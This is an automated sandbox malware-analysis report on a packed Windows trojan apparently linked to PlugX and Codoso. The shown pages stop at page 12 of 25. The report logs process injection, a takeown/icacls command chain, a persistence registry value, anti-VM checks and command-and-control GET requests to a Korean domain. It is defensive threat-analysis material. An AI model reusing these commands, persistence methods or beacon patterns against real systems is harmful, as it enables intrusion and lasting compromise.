Free Automated Malware Analysis Service - powered by Falcon Sandbox
Archived: 2026-04-02 10:36:53 UTC
Attention: please enable javascript in order to properly view and use this malware analysis service.
Incident Response
Risk Assessment
Persistence
Grants permissions using icacls (DACL modification)
Injects into explorer
Injects into remote processes
Spawns a lot of processes
Tries to take ownership of files
Writes data to a remote process
Network Behavior
Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
Environment Awareness
The input sample contains a known anti-VM trick
details
Found VM detection artifact "VMware trick" in "c9b65b764985dfd7a11d3faf599c56b8.exe.bin"
(Offset: 2230)
source
Binary File
relevance
5/10
External Systems
Detected Suricata Alert
details
Detected alert "ETPRO TROJAN Win32/Spy.Keydoor.D Checkin" (SID: 2805200, Rev: 4, Severity: 1)
categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "CrowdStrike SILENT CHOLLIMA HTTP/IRC Bot/RAT and Concealment Troy GET
Request" (SID: 181303201, Rev: 20130830, Severity: 1) categorized as "A Network Trojan was
detected"
source
Suricata Alerts
relevance
10/10
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
details
3/67 reputation engines marked "http://lawbookcenter.co.kr/shop/temp/goods_list.php" as malicious
(4% detection rate)
3/64 reputation engines marked "http://solarshade.co.kr/eml/goods_list_ok.php" as malicious (4%
detection rate)
source
External System
relevance
10/10
Sample was identified as malicious by a large number of Antivirus engines
details
46/66 Antivirus vendors marked sample as malicious (69% detection rate)
source
External System
relevance
10/10
Sample was identified as malicious by at least one Antivirus engine
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 1 of 25

details
46/66 Antivirus vendors marked sample as malicious (69% detection rate)
source
External System
relevance
8/10
General
The analysis extracted a file that was identified as malicious
details
51/65 Antivirus vendors marked dropped file "w7e2219.tmp" as malicious (classified as
"Gen:ExplorerHijack.Hu4@aWQ@tkgO" with 78% detection rate)
37/50 Antivirus vendors marked dropped file "~ER24B7.tmp" as malicious (classified as
"Gen:Trojan.Heur.LP" with 74% detection rate)
43/53 Antivirus vendors marked dropped file "~ER1AFA.tmp" as malicious (classified as
"Trojan.Generic" with 81% detection rate)
source
Binary File
relevance
10/10
The analysis spawned a process that was identified as malicious
details
43/53 Antivirus vendors marked spawned process "~ER1AFA.tmp" (PID: 2080) as malicious
(classified as "Trojan.Generic" with 81% detection rate)
source
Monitored Target
relevance
10/10
Installation/Persistance
Allocates virtual memory in a remote process
details
"<Input Sample>" allocated memory in "%TEMP%\ud.bat"
"~ER1AFA.tmp" allocated memory in "%TEMP%\w7e2219.tmp"
"sysprep.exe" allocated memory in
"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders"
source
API Call
relevance
7/10
Injects into explorer
details
Injected into "explorer.exe" (Show Process)
source
Monitored Target
relevance
5/10
Injects into remote processes
details
Injected into "explorer.exe" at 2018-6-12.01:21:31.015 (Show Process)
source
Monitored Target
relevance
6/10
Writes data to a remote process
details
"<Input Sample>" wrote 32 bytes to a remote process "%TEMP%\~ER1AFA.tmp" (Handle: 44)
"<Input Sample>" wrote 52 bytes to a remote process
"C:\Users\%USERNAME%\AppData\Local\Temp\~ER1AFA.tmp" (Handle: 44)
"<Input Sample>" wrote 4 bytes to a remote process
"C:\Users\%USERNAME%\AppData\Local\Temp\~ER1AFA.tmp" (Handle: 44)
"~ER1AFA.tmp" wrote 96 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 56 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 28 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 84 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 80 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 2 of 25

"~ER1AFA.tmp" wrote 88 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 24 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 20 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 13 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 15 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 12 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 17 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 16 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 134 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"~ER1AFA.tmp" wrote 1104 bytes to a remote process "C:\Windows\explorer.exe" (Handle: 132)
"explorer.exe" wrote 32 bytes to a remote process "C:\Windows\System32\sysprep\sysprep.exe"
(Handle: 3072)
"explorer.exe" wrote 52 bytes to a remote process "C:\Windows\System32\sysprep\sysprep.exe"
(Handle: 3072)
"explorer.exe" wrote 4 bytes to a remote process "C:\Windows\System32\sysprep\sysprep.exe"
(Handle: 3072)
"sysprep.exe" wrote 32 bytes to a remote process "C:\Program Files\Internet Explorer\iexplore.exe"
(Handle: 312)
"sysprep.exe" wrote 52 bytes to a remote process "C:\Program Files\Internet Explorer\iexplore.exe"
(Handle: 312)
"sysprep.exe" wrote 4 bytes to a remote process "C:\Program Files\Internet Explorer\iexplore.exe"
(Handle: 312)
"sysprep.exe" wrote 8 bytes to a remote process "C:\Program Files\Internet Explorer\iexplore.exe"
(Handle: 312)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\takeown.exe" (Handle: 84)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\takeown.exe" (Handle: 84)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\takeown.exe" (Handle: 84)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\System32\icacls.exe" (Handle: 80)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\System32\icacls.exe" (Handle: 80)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\System32\icacls.exe" (Handle: 80)
"iexplore.exe" wrote 32 bytes to a remote process "C:\Program Files\Internet Explorer\iexplore.exe"
(Handle: 1164)
"iexplore.exe" wrote 52 bytes to a remote process "C:\Program Files\Internet Explorer\iexplore.exe"
(Handle: 1164)
"iexplore.exe" wrote 4 bytes to a remote process "C:\Program Files\Internet Explorer\iexplore.exe"
(Handle: 1164)
source
API Call
relevance
6/10
Pattern Matching
YARA signature match
details
YARA signature "Codoso_Gh0st_1" classified file "~ER1AFA.tmp" as "apt,codoso,plugx" based on
indicators:
"45006c00650076006100740069006f006e003a00410064006d0069006e006900730074007200610074006f00720021006e006500770
(Reference: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, Author:
Florian Roth)
Internal YARA signature matched on process "~ER1AFA.tmp"
Internal YARA signature matched on file "all.bstring"
source
YARA Signature
relevance
10/10
System Security
Modifies the access control lists of files
details
Process "icacls.exe" with commandline "icacls "%WINDIR%\system32\msimg64.dll" /grant
administrators:F" (Show Process)
source
Monitored Target
relevance
5/10
Unusual Characteristics
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 3 of 25

Spawns a lot of processes
details
Spawned process "<Input Sample>" (Show Process)
Spawned process "~ER1AFA.tmp" (Show Process)
Spawned process "sysprep.exe" with commandline ""%WINDIR%\System32\sysprep\sysprep.exe" ""
(Show Process), Spawned process "cmd.exe" with commandline "/c takeown /f
"%WINDIR%\system32\msimg64.dll" && icacls "%WINDIR%\system32\msimg64.dll" /grant
administrators:F" (Show Process), Spawned process "takeown.exe" with commandline "takeown /f
"%WINDIR%\system32\msimg64.dll"" (Show Process), Spawned process "icacls.exe" with
commandline "icacls "%WINDIR%\system32\msimg64.dll" /grant administrators:F" (Show Process),
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\\ud.bat" (Show Process)
source
Monitored Target
relevance
8/10
Hiding 3 Malicious Indicators
All indicators are available only in the private webservice or standalone version
Anti-Detection/Stealthyness
Contains ability to open/control a service
Queries process information
details
"~ER1AFA.tmp" queried SystemProcessInformation at 00013784-00002080-00000105-8311148578
source
API Call
relevance
4/10
Anti-Reverse Engineering
PE file has unusual entropy sections
details
UPX1 with unusual entropies 7.9309190833
source
Static Parser
relevance
10/10
PE file is packed with UPX
details
"c9b65b764985dfd7a11d3faf599c56b8.exe.bin" has a section named "UPX0"
"c9b65b764985dfd7a11d3faf599c56b8.exe.bin" has a section named "UPX1"
source
Static Parser
relevance
10/10
Cryptographic Related
Found a cryptographic related string
details
"DES" (Indicator: "des"; File: "00013784-00002080.00000000.14285.00995000.00000002.mdmp")
source
File/Memory
relevance
10/10
Environment Awareness
Contains ability to query CPU information
External Systems
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
details
3/67 reputation engines marked "http://lawbookcenter.co.kr/shop/temp/goods_list.php" as malicious
(4% detection rate)
3/64 reputation engines marked "http://solarshade.co.kr/eml/goods_list_ok.php" as malicious (4%
detection rate)
1/67 reputation engines marked "http://lawbookcenter.co.kr" as malicious (1% detection rate)
source
External System
relevance
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 4 of 25

10/10
General
Contains ability to find and load resources of a specific module
details
FindResourceW@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)
source
Hybrid Analysis Technology
relevance
1/10
Installation/Persistance
Contains ability to create a remote thread (often used for process injection)
details
CreateRemoteThread@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)
source
Hybrid Analysis Technology
relevance
8/10
Contains ability to write to a remote process
details
WriteProcessMemory@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)
WriteProcessMemory@KERNEL32.dll (Show Stream)
WriteProcessMemory@KERNEL32.dll (Show Stream)
source
Hybrid Analysis Technology
relevance
8/10
Creates new processes
details
"<Input Sample>" is creating a new process (Name: "%TEMP%\~ER1AFA.tmp", Handle: 44)
"<Input Sample>" is creating a new process
"<Input Sample>" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 52)
"explorer.exe" is creating a new process (Name:
"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe", Handle: 3072)
"sysprep.exe" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 304)
"sysprep.exe" is creating a new process (Name: "%PROGRAMFILES%\Internet
Explorer\iexplore.exe", Handle: 312)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\takeown.exe", Handle: 84)
"cmd.exe" is creating a new process (Name: "%WINDIR%\System32\icacls.exe", Handle: 80)
"iexplore.exe" is creating a new process (Name: "C:\Program Files\Internet Explorer\iexplore.exe",
Handle: 1164)
source
API Call
relevance
8/10
Drops executable files
details
"w7e2219.tmp" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"~ER24B7.tmp" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"~ER1AFA.tmp" has type "PE32 executable (console) Intel 80386 for MS Windows"
source
Binary File
relevance
10/10
Spyware/Information Retrieval
Contains ability to enumerate processes/modules/threads
details
CreateToolhelp32Snapshot@KERNEL32.DLL from ~ER1AFA.tmp (PID: 2080) (Show Stream)
source
Hybrid Analysis Technology
relevance
5/10
System Destruction
Marks file for deletion
details
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 5 of 25

"C:\c9b65b764985dfd7a11d3faf599c56b8.exe" marked "%TEMP%\~ER1AFA.tmp" for deletion
"%TEMP%\~ER1AFA.tmp" marked "%TEMP%\w7e2219.tmp" for deletion
"%WINDIR%\System32\sysprep\sysprep.exe" marked "%TEMP%\~ER24B7.tmp" for deletion
source
API Call
relevance
10/10
Opens file with deletion access rights
details
"<Input Sample>" opened "%TEMP%\~ER1AFA.tmp" with delete access
"~ER1AFA.tmp" opened "%TEMP%\w7e2219.tmp" with delete access
"sysprep.exe" opened "%TEMP%\~ER24B7.tmp" with delete access
source
API Call
relevance
7/10
System Security
Grants permissions using icacls (DACL modification)
details
Process "icacls.exe" with commandline "icacls "%WINDIR%\system32\msimg64.dll" /grant
administrators:F" (Show Process)
source
Monitored Target
relevance
3/10
Tries to take ownership of files
details
Process "cmd.exe" with commandline "/c takeown /f "%WINDIR%\system32\msimg64.dll" && icacls
"%WINDIR%\system32\msimg64.dll" /grant administrators:F" (Show Process)
source
Monitored Target
relevance
5/10
Unusual Characteristics
CRC value set in PE header does not match actual value
details
"w7e2219.tmp" claimed CRC 564747 while the actual is CRC 354185
"~ER24B7.tmp" claimed CRC 289298 while the actual is CRC 564747
"~ER1AFA.tmp" claimed CRC 1105664 while the actual is CRC 289298
source
Static Parser
relevance
10/10
Entrypoint in PE header is within an uncommon section
details
"c9b65b764985dfd7a11d3faf599c56b8.exe.bin" has an entrypoint in section "UPX1"
source
Static Parser
relevance
10/10
Imports suspicious APIs
details
RegCloseKey
VirtualProtect
GetProcAddress
VirtualAlloc
LoadLibraryA
OpenProcessToken
StartServiceA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
GetTempPathA
WriteFile
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 6 of 25

WriteProcessMemory
GetModuleFileNameW
CopyFileA
GetModuleFileNameA
UnhandledExceptionFilter
GetModuleHandleA
TerminateProcess
CreateToolhelp32Snapshot
LoadLibraryW
GetTickCount
GetVersionExA
Process32Next
CreateRemoteThread
GetStartupInfoA
Process32First
DeleteFileA
GetStartupInfoW
GetTempFileNameA
CreateFileW
IsDebuggerPresent
CreateFileA
VirtualAllocEx
LockResource
GetCommandLineA
GetModuleHandleW
CreateProcessA
Sleep
FindResourceA
CryptEncrypt
CreateProcessAsUserA
RegDeleteValueA
CreateFileMappingA
GetFileAttributesA
GetDriveTypeA
OpenFileMappingA
CreateThread
ExitThread
GetFileSize
OpenProcess
CreateDirectoryA
FindFirstFileA
GetComputerNameA
FindNextFileA
MapViewOfFile
GetCommandLineW
DeleteFileW
Process32FirstW
GetTempFileNameW
Process32NextW
GetTempPathW
FindResourceW
VirtualProtectEx
source
Static Parser
relevance
1/10
Hiding 1 Suspicious Indicators
All indicators are available only in the private webservice or standalone version
Anti-Reverse Engineering
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
PE file contains zero-size sections
details
Raw size of "UPX0" is zero
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 7 of 25

source
Static Parser
relevance
10/10
Environment Awareness
Contains ability to query machine time
Contains ability to query the machine version
details
GetVersionExA@KERNEL32.dll (Show Stream)
GetVersionExA@KERNEL32.dll (Show Stream)
source
Hybrid Analysis Technology
relevance
1/10
Contains ability to query the system locale
Makes a code branch decision directly after an API that is environment aware
details
Found API call GetLocalTime@KERNEL32.dll directly followed by "cmp esi, dword ptr
[10038A64h]" and "jnl 10001CD0h" (Show Stream)
Found API call GetVersionExA@KERNEL32.dll directly followed by "cmp dword ptr [ebp-00000094h], 06h" and "inc eax" (Show Stream)
Found API call GetVersionExA@KERNEL32.dll directly followed by "cmp dword ptr [ebp-00000094h], 06h" and "inc eax" (Show Stream)
source
Hybrid Analysis Technology
relevance
10/10
Reads the active computer name
details
"sysprep.exe" (Path:
"HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME";
Key: "COMPUTERNAME")
"takeown.exe" (Path:
"HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME";
Key: "COMPUTERNAME")
"icacls.exe" (Path:
"HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME";
Key: "COMPUTERNAME")
source
Registry Access
relevance
5/10
Tries to sleep for a long time (more than two minutes)
details
"iexplore.exe" sleeping for "01320000" milliseconds
source
API Call
relevance
10/10
General
Contacts domains
details
"solarshade.co.kr"
source
Network Traffic
relevance
1/10
Contacts server
details
"221.143.46.43:80"
source
Network Traffic
relevance
1/10
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 8 of 25

Contains PDB pathways
details
"o.pdbm1V"
"%SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP
Troy\HttpDr0pper\x64\Release\3PayloadDll.pdb"
"%SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP
Troy\HttpDr0pper\Win32\Release\HttpSecurityProvider.pdb"
"%SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP
Troy\HttpDr0pper\x64\Release\HttpSecurityProvider.pdb"
"%SAMPLEDIR%\1Mission\Team_Project\[2012.6 ~]\HTTP
Troy\HttpDr0pper\Win32\Release\3PayloadDll.pdb"
source
File/Memory
relevance
1/10
Creates a writable file in a temporary directory
details
"<Input Sample>" created file "%TEMP%\~ER1AFA.tmp"
"<Input Sample>" created file "%TEMP%\ud.bat"
"~ER1AFA.tmp" created file "%TEMP%\w7e2219.tmp"
"sysprep.exe" created file "%TEMP%\~ER24B7.tmp"
"iexplore.exe" created file "%TEMP%\~DFF452498869DECF72.TMP"
"iexplore.exe" created file "%TEMP%\~DFF818A5A707F378C8.TMP"
"iexplore.exe" created file "%TEMP%\~13785.tmp"
source
API Call
relevance
1/10
Creates mutants
details
"\Sessions\1\BaseNamedObjects\{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}"
"{C20CD437-BA6D-4ebb-B190-70B43DE3B0F3}"
"\Sessions\1\BaseNamedObjects\SYSPREP-APP-5c9fbbd0-ee0e-11d2-9a21-0000f81edacc"
"\Sessions\1\BaseNamedObjects\Global\WdsSetupLogInit"
"\Sessions\1\BaseNamedObjects\Global\SetupLog"
"Global\SetupLog"
"SYSPREP-APP-5c9fbbd0-ee0e-11d2-9a21-0000f81edacc"
"Global\WdsSetupLogInit"
"\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
"\Sessions\1\BaseNamedObjects\Local\c:!users!ffqm9td!appdata!local!microsoft!windows!temporary
internet files!content.ie5!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!ffqm9td!appdata!roaming!microsoft!windows!cookies!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!ffqm9td!appdata!local!microsoft!windows!history!history.ie5!"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
source
Created Mutant
relevance
3/10
GETs files from a webserver
details
"GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
"GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
"GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
source
Network Traffic
relevance
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 9 of 25

5/10
Launches a browser
details
Launches browser "iexplore.exe" (Show Process)
Launches browser "iexplore.exe" (Show Process)
source
Monitored Target
relevance
3/10
Process launched with changed environment
details
Process "explorer.exe" (Show Process) was launched with new environment variables:
"SESSIONNAME="Console""
Process "explorer.exe" (Show Process) was launched with modified environment variables: "Path"
Process "explorer.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "takeown.exe" (Show Process) was launched with new environment variables:
"PROMPT="$P$G""
Process "iexplore.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "cmd.exe" (Show Process) was launched with new environment variables:
"PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with modified environment variables: "Path"
Process "cmd.exe" (Show Process) was launched with missing environment variables:
"SESSIONNAME"
source
Monitored Target
relevance
10/10
Runs shell commands
details
"/c takeown /f "%WINDIR%\system32\msimg64.dll" && icacls
"%WINDIR%\system32\msimg64.dll" /grant administrators:F" on 2018-6-12.01:21:31.576
"cmd /c %TEMP%\\ud.bat" on 2018-6-12.01:22:54.322
source
Monitored Target
relevance
5/10
Spawns new processes
details
Spawned process "~ER1AFA.tmp" (Show Process)
Spawned process "sysprep.exe" with commandline ""%WINDIR%\System32\sysprep\sysprep.exe" ""
(Show Process), Spawned process "cmd.exe" with commandline "/c takeown /f
"%WINDIR%\system32\msimg64.dll" && icacls "%WINDIR%\system32\msimg64.dll" /grant
administrators:F" (Show Process), Spawned process "iexplore.exe" with commandline
"www.google.com" (Show Process), Spawned process "takeown.exe" with commandline "takeown /f
"%WINDIR%\system32\msimg64.dll"" (Show Process), Spawned process "icacls.exe" with
commandline "icacls "%WINDIR%\system32\msimg64.dll" /grant administrators:F" (Show Process),
Spawned process "iexplore.exe" with commandline "SCODEF:2096 CREDAT:79873" (Show Process),
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\\ud.bat" (Show Process)
source
Monitored Target
relevance
3/10
Tries to GET non-existent files from a webserver
details
"GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
"GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
"GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
source
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 10 of 25

Network Traffic
relevance
5/10
Installation/Persistance
Connects to LPC ports
details
"sysprep.exe" connecting to "\ThemeApiPort"
source
API Call
relevance
1/10
Dropped files
details
"ud.bat" has type "DOS batch file ASCII text with CRLF line terminators"
"diagerr.xml" has type "UTF-8 Unicode (with BOM) text with very long lines"
"w7e2219.tmp" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"setuperr.log" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"
"~13785.tmp" has type "HTML document ASCII text"
"RecoveryStore.{B4365893-6E19-11E8-989D-0A00278A626A}.dat" has type "Composite Document
File V2 Document Cannot read section info"
"desktop.ini" has type "empty"
"{B4365894-6E19-11E8-989D-0A00278A626A}.dat" has type "Composite Document File V2
Document Cannot read section info"
"~ER24B7.tmp" has type "PE32 executable (DLL) (GUI) Intel 80386 for MS Windows"
"setupact.log" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"
"~ER1AFA.tmp" has type "PE32 executable (console) Intel 80386 for MS Windows"
"diagwrn.xml" has type "UTF-8 Unicode (with BOM) text"
source
Binary File
relevance
3/10
Modifies auto-execute functionality by setting/creating a value in the registry
details
"sysprep.exe" (Access type: "SETVAL"; Path:
"HKLM\SYSTEM\CONTROLSET001\CONTROL\SECURITYPROVIDERS"; Key:
"SECURITYPROVIDERS"; Value: "credssp.dll, msimg64.dll")
source
Registry Access
relevance
8/10
Monitors specific registry key for changes
details
"takeown.exe" monitors
"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NetworkProvider\HwOrder" (Filter: 4;
Subtree: 0)
source
API Call
relevance
4/10
Opens the MountPointManager (often used to detect additional infection locations)
details
"iexplore.exe" opened "\Device\MountPointManager"
"takeown.exe" opened "\Device\MountPointManager"
source
API Call
relevance
5/10
Touches files in the Windows directory
details
"<Input Sample>" touched file "C:\Windows\AppPatch\sysmain.sdb"
"~ER1AFA.tmp" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"explorer.exe" touched file "C:\Windows\System32"
"explorer.exe" touched file "C:\Windows\System32\sysprep\sysprep.exe"
"explorer.exe" touched file "C:\Windows\AppPatch\sysmain.sdb"
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 11 of 25

"explorer.exe" touched file "C:\Windows\System32\sysprep"
"explorer.exe" touched file "%ALLUSERSPROFILE%\Microsoft\Windows\Start
Menu\Programs\Administrative Tools\System Configuration.lnk"
"explorer.exe" touched file "C:\Windows\System32\msconfig.exe"
"explorer.exe" touched file
"C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations"
"explorer.exe" touched file
"C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\dcd5734867e97.customDestination
ms"
"explorer.exe" touched file
"C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations"
"explorer.exe" touched file
"C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\cbc036d6fdb69fb5.customDestinat
ms"
source
API Call
relevance
7/10
Network Related
Found potential URL in binary/memory
details
Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"
Heuristic match: "GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
Heuristic match: "GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
Heuristic match: "GET /eml/goods_list_ok.php?
no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841
HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: solarshade.co.kr"
Heuristic match: "solarshade.co.kr"
Pattern match: "www.google.com"
Pattern match: "http://solarshade.co.kr/eml/goods_list_ok.php"
Pattern match: "http://lawbookcenter.co.kr/shop/temp/goods_list.php"
Pattern match: "http://%s"
source
File/Memory
relevance
10/10
HTTP request contains Base64 encoded artifacts
details
"o8q[qw_tu"
"7{i<_{M"
"]w^^8q7nk5"
source
Network Traffic
relevance
7/10
Unusual Characteristics
Installs hooks/patches the running process
details
"takeown.exe" wrote bytes
"4053ed765858ee76186aee76653cef760000000000bf36750000000056cc3675000000007cca36750000000037682a756a2cef76d62de
to virtual address "0x76FE1000" (part of module "NSI.DLL")
"iexplore.exe" wrote bytes "e9e89afcf8" to virtual address "0x7550E30C" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e9b943f2f8" to virtual address "0x75523B9B" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e9fda405f9" to virtual address "0x755F4731" (part of module
"OLEAUT32.DLL")
"iexplore.exe" wrote bytes "e9652b03f9" to virtual address "0x7550ADF9" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e98b8e05f9" to virtual address "0x755F5DEE" (part of module
https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
Page 12 of 25

"OLEAUT32.DLL")
"iexplore.exe" wrote bytes "e937f20ef9" to virtual address "0x7555E963" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e99ac3c9f8" to virtual address "0x759B2694" (part of module
"COMDLG32.DLL")
"iexplore.exe" wrote bytes "e99d9af3f8" to virtual address "0x755F3E59" (part of module
"OLEAUT32.DLL")
"iexplore.exe" wrote bytes "e96ff10ef9" to virtual address "0x7555E9C9" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e9ee7eeaf8" to virtual address "0x757A6143" (part of module
"OLE32.DLL")
"iexplore.exe" wrote bytes "e9c20a10f9" to virtual address "0x7554D274" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e9efb971fa" to virtual address "0x73F3388E" (part of module
"COMCTL32.DLL")
"iexplore.exe" wrote bytes "e9e9f00ef9" to virtual address "0x7555E9ED" (part of module
"USER32.DLL")
"iexplore.exe" wrote bytes "e955a5f3f8" to virtual address "0x755F3EAE" (part of module
"OLEAUT32.DLL")
"iexplore.exe" wrote bytes "e99cf30ef9" to virtual address "0x7555E869" (part of module
"USER32.DLL")
